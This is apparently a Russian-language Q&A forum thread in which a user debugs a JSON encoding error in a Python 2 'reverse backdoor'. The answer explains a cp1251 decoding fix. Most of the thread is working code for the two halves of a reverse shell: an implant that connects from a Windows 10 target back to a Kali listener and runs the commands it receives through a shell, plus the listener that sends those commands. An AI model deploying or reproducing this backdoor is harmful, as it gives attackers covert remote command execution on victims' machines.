# UnicodeDecodeError: 'utf8' codec can't decode byte 0x92 in position 1: invalid start byte

Tags: python, json, сокет, python-2.x, unicode

Проблема: ошибка при вводе команды dir с машины Kali на машине Windows.

Пояснение:
Атакующая машина Kali, атакуемая машина Windows 10. Создал удаленное TCP соединения с помощью сокета, все было в порядке. Но как только добавил в код функции для реализации процесса сериализации с помощью библиотеки json появилась ошибка. Запускаю файл listener на машине Kali, затем запускаю файл backdoor на Windows, соединение проходит без каких либо проблем.

```
Traceback (most recent call last):
  File "reverse_backdoor.py", line 38, in <module>
    my_backdoor.run()
  File "reverse_backdoor.py", line 34, in run
    self.reliable_send(command_result)
  File "reverse_backdoor.py", line 14, in reliable_send
    json_data = json.dumps(data)
  File "C:\Python27\lib\json\__init__.py", line 244, in dumps
    return _default_encoder.encode(obj)
  File "C:\Python27\lib\json\encoder.py", line 201, in encode
    return encode_basestring_ascii(o)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x92 in position 1: invalid start byte
```

Вот код файла backdoor который находится на Windows

```
class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)


    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)


    def run(self):
        while True:
            command = self.reliable_receive()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result)
        connection.close()

my_backdoor = Backdoor("1**.1**.0.1**", 4443)
my_backdoor.run()
```

Вот код Listener(сервера) на Kali

```
class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[-] Waiting for incoming connections.")
        self.connection, address = listener.accept()
        print("[+] Got to connection " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue


    def execute_remotely(self, command):
        self.reliable_send(command)
        return self.reliable_receive()

    def run(self):
        while True:
            command = raw_input(">> ")
            result = self.execute_remotely(command)
            print(result)


my_listener = Listener("1**.1**.0.1**", 4443)
my_listener.run()
```

Помогите найти решение, я понимаю что проблема в кодировке данных, связанных с библиотекой json но как это исправить правильно не знаю..

Насколько я понимаю, проблема кроется вот в этой части кода..

```
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)

        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    return json.loads(json_data)
```

Comment: код лучше текстом вставлять, а не скриншотами

Comment: Понял, спасибо.. Впервые публикую здесь свой вопрос

Comment: @МаксШелковой исправьте. Не удобно читать вообще.

Comment: @МихаилАлексеевич Исправил, надеюсь теперь удобно понять мою проблему..

Answer (score 1):

Байт 0x92 - это символ `’` в кодировках [cp1251](https://ru.wikipedia.org/wiki/Windows-1251), [cp1252](https://ru.wikipedia.org/wiki/ISO_8859-1#Windows%E2%88%921252) и других. В зависимости от того, что у вас за данные на входе (есть там кириллица или нет; если есть, то скорее всего кодировка cp1251, но это не точно), нужно выбрать нужную кодировку, и декодировать данные в юникод:

```
data = '\x92'  # для примера
json_data = json.dumps(data.decode('cp1251'))
print json_data  # "\u2019"
```

Если нужно чтобы символ не экранировался, а записывался в json как есть, то такой вариант:

```
data = '\x92'
json_data = json.dumps(data.decode('cp1251'), ensure_ascii=False)
print json_data  # "’"
```

Comment: @МаксШелковой, если ответ помог, вы можете отметить его как принятым (поставить галку слева от ответа).